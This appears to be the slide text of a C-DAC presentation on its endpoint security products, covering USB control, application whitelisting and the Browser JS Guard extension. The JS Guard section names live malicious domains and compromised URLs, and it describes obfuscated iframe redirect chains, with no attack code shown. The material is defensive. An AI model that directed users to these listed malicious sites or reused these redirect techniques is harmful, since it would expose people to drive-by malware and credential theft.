endpoint security solutions

Endpoint Security Solutions

• USB Pratirodh • Browser JS Guard • AppSamvid

•Malware Nivarak •Malware Resist •Application and Device Control •Workflow Analyser

USB Pratirodh

Protects from unauthorized usage of USB devices

Highlights of USBPratirodh

Blocking and unblocking of USB mass storage devices such as cameras, pen drives, mobiles, printers, external hard disks etc

Encryption and decryption of files and folders.

Virus detection and Autorun protection

User Authentication (only registered devices can be authenticated)

Verified and Certified by STQC

Highlights of USBPratirodh

Supports Windows (windows xp sp3, Vista, 7, 8)

Sold licenses to IRISET, ISRO, ECIL, Heavy water plant, Headquarters 9 corps and C-DAC Mumbai.

Deployed at NAVY, DRDO, CERT-IN, CDAC-Bengaluru.

Salient Features and Benefits

Whitelisting of USB Devices

User Authentication for accessing USB Devices

Malware Detection in USB storage Devices

Data Encryption for USB Storage Devices

List of Attacks Addressed

Protect Against misuse of USB Devices

Protect against malware executing from USB Devices

Encryption protects data in case if device is lost

Hardware and Software Requirements

Microsoft Windows XP(SP3) and above.

Recommended 100 MB of Hard disk space.

Snapshots

Snapshots

Snapshots

Potential user agencies / organizations

Any computer user or organization

Browser JS Guard

Add-on for browsers to protect from JavaScript based malware

Highlights of the Product

Detected the Malware which has not been detected by any other Anti-Malware solutions.

Validated and Certified by CERT-In Real-time code injection detection and prevention in the web

pages Everything we capture is happening in the wild (there is no

theory) Collects Little data and data reported is of high value Early warning and prevention Automatic product updates via Internet Designed as a Browser Extension and available in Popular web

browser repositories Consumption of minimal resources

Click here to see the Report

Salient Features

Content/Heuristic based JS & HTML Malware protection

Alerts the User on visiting Malicious Web pages

Provides detailed analysis of webpage threats

Ease of installation

Compatible Web Browsers

Web Browser Name Compatible with Version

Supported OS

Firefox >= 14.0 Windows & Linux

Google Chrome >= 14.0 Windows & Linux

Iceweasel >= 21.0 Windows & Linux

Opera >= 11.0 Windows & Linux

Internet Explorer = 9.0 Windows

Value of the Product

Detects

– Client side Redirections

– Redirections through DOM changing functions

– Runtime JavaScript Code Injections

Malicious Web Page Analysis and Detection through

Browser JS Guard

Malicious Redirection Attack Vectors

Possible vectors are

– Hidden Activities

– Obfuscated JavaScript code

– Un Authorized Redirections

Detection of Hidden Activities

Exploits Through “brenz.pl”

www.brenz.pl - exploit site pre-loaded with an exploit kit called Eleonore. It is dangerous domain specially created to propagate

rogue program, Trojan horse, browser hijacker and it can lead to system freeze.

It may even cause things like identity theft, financial loss and permanent file deletion.

The main Indian site of Moneycontrol.com was compromised and injected with malicious code on November 6, 2010. The injected code redirected users to an exploit website “brenz.pl”.

Example URL is http://www.tradersbay.in/login.php

Browser JS Guard - Detection of brenz.pl based attacks

Browser JS Guard - Detection of brenz.pl based attacks

Exploits Through “xanjan.cn”

www.xanjan.cn - collects the passwords on the site when user login into his account.

– Example infected URL is

• http://compass.co.in/achieve2003-2004.php

• Infection present in this website is

Browser JS Guard - Detection of xanjan.cn based attacks

Detection of Obfuscated JavaScript Code based Attacks

Drive by Download Attack

http://feeds.feedburner.com/bileblog is an infected URL.

It drops JavaScript Trojan. This URL performs the redirection chain as

follows:

hxxp://rsnvlbgcba.ibiz.cc/d/404.php?go=1

▪ Intermediate Redirection

hxxp://fukbb.com/

▪ Final Redirection

Analysis – Obfuscated Code

Analysis – De Obfuscated Code

Analysis

The de-obfuscated code loads an iFrame into the victim’s browser, which is redirecting the user to ‘hxxp://rsnvlbgcba.ibiz.cc/d/404.php?go=1’, which in turn redirects it to ‘hxxp://fukbb.com/’.

The source code hosted at intermediate site is a simple redirect.

Final Redirected Page

Browser JS Guard - Detection of Obfuscated JavaScript Code

Detection of Un Authorized Redirection Attacks

Infected URL

foto.kku.in is the infected URL It refers to malicious cross domains and attacks the user

Browser JS Guard - Detection of UnAuthorized Redirections

Detection Rate

Potential user agencies / organizations

Any end system user

Downloadable Links

Download links

– For Firefox web browser: https://addons.mozilla.org/en-US/firefox/addon/browser-jsguard/

– For Google chrome web browser: https://chrome.google.com/webstore/detail/browserjsguard/ncpkigeklafkopcelcegambndlhkcbhb

AppSamvid

Application Whitelisting Solution

Features

Whitelists .exe, .dll, .sys, .war, .jar and .class files

Automatic whitelisting of Windows Updates

Potential updater file(s) identification for 3rd party software’s

Installation mode – Supports installation of new software's

– To allow updating of applications

Folder scan option to add applications to database

Password based access to GUI

Password based uninstallation

1/23/2015 C-DAC 39

List of Attacks Addressed

Protects against

– Zero day attacks

– Trojans

1/23/2015 C-DAC 40

Technical Architecture

1/23/2015 C-DAC 41

Hardware and Software Requirements

No extra hardware required

Works with Microsoft Windows

– XP SP3 onwards

– Requires minimum 5 MB of free hard disk space to maximum of 25 MB of hard disk space approx.

Requires mini-filter driver support by Microsoft Windows

1/23/2015 C-DAC 42

Snapshot – Home screen

1/23/2015 C-DAC 43

Snapshot – Edit screen

1/23/2015 C-DAC 44

Snapshot – Settings screen

1/23/2015 C-DAC 45

Snapshot – Logs screen

1/23/2015 C-DAC 46

Potential user agencies

Industrial Control Systems

ATMs (Automated Teller Machines)

Point of Sale systems

Small Business Users

1/23/2015 C-DAC 47

Malware Nivarak

Application Behaviour Whitelisting

Objectives

Detects deviations at runtime from normal behaviour of modelled applications

Features

Ability to prevent Zero-day attacks on modelled applications via

– File access Monitor

– Registry access Monitor

Co-exists with other Anti-virus solutions

Integrated Malware Resist

Technical Architecture

Generate Model

Verify Model

Dynamic Policy Enforcement

GUI (Threat Alert)

Verification Policies

Applications Behavioral Heuristic Policies

Running Processes

Dynamic Model Enforcement

Execution

Trusted Models

success

Failure

Un-trusted Application

Software Requirements

Microsoft Windows XP(SP3) and above.

Recommended 100 MB of Hard disk space.

Bundled Application Models

with installer

By default, Malware Nivarak is bundled with

– Adobe Acrobat Reader (8 and 10)

– MS office 2007

– MS Excel

– MS Word

– MS Power point

Supports model generation of other applications

– One can generate model and enforce them at runtime.

Other Software Measurements

Memory Foot Print: ~ 50 MB

Hard disk space: ~ 10 MB (depends on the applications model files)

Malware Resist

Process Execution Control

Details

Detects – Malicious processes at runtime

Salient Features and Benefits – Able to detect malware with its unique heuristic

technology – Capability to detect unknown malware – Protects from the malware before they do any harm to

your system – Easy to use – Even if your antivirus hasn’t detected a suspicious

process, you can quarantine it

Malware Resist

• Classifies Processes (and monitors) in the system as

– Un-trusted

– user trusted processes

• Malicious behaviors which may cause damage to system

– 46 critical behaviors are monitored

57

Some of the behaviors monitored

Code injection attempts

Packed executables

Changing security rights

Attempts to disable system tools

Installing a hidden service

Hidden processes

58

Specifications

Processor - Pentium IV Processor onwards

RAM - 256 MB (recommended)

Hard Disk - 20 MB

OS - Windows XP SP2, SP3, Windows Vista

Application and Device Control

Manage Applications And USB Mass Storage Devices In Your Domain

Network

Introduction

ADC is centralized management console to manage client components in Windows Active Directory Domain Network

Integrates following components – AppSamvid functionality as Application Control

– Binary Heuristic Analysis

– Rootkit Detection Engine

– Browser JSGuard

– Malware Nivarak functionality as MPS

– USB Pratirodh functionality as Device Control

Features

SSL enabled Web based management console

Remote Deployment of client components – requires domain administrator privileges

Supports Batch Installation of remote clients

Centralized Logging – using MSMQ (Microsoft Message Queuing)

Graphical Log Analysis

Additional Features

Supports verifying application hashes with VirusTotal

Analysis of applications during scanning with heuristic application analyser

Supports Import/Export of whitelists

Remote registration of USB devices

Supports USB printers and scanners

Rootkit detection on Windows XP SP 2 and SP3 systems

Technical Architecture

Application Control Server

Application Sandbox for Unknown Applications

Active Directory Environment

Client System

Remote Installation of Agent

Client Server Communication Scan Notification, Submit application details Logs etc.

Database (Whitelists/Policies)

1. Application whitelists 2. Device control policies

Enforcement of Policies

Application Control Agent

Device Control Agent

Device Control Server

Minimum Hardware and Software Requirements

Server – Windows Server 2008 – Active Directory Environment – PostgreSQL 9.2 – Apache Web Server 2.2.x with PHP 5 – Minimum 500 MB hard disk space. (1 GB

Recommended)

Client – Microsoft Windows Vista and above. – Configured to use Active Directory. – Recommended 100 MB of Hard disk space.

Snapshots – Application Control

Snapshots – Device Control

Snapshots – Deploy components

Potential user agencies / organizations

Small to medium sized Enterprise networks

SCADA Environments

Work flow Analyzer

• Acts as a interceptor between web server and web client.

• Analyzes the state deviation attacks at run time execution of web application.

• Targeted attacks – Authentication bypass – Authorization bypass – Sequence bypass

• Works with 2 Phases – Learning Phase – Detection Phase

Work flow Analyzer

Learning Phase

Detection Phase

Thank You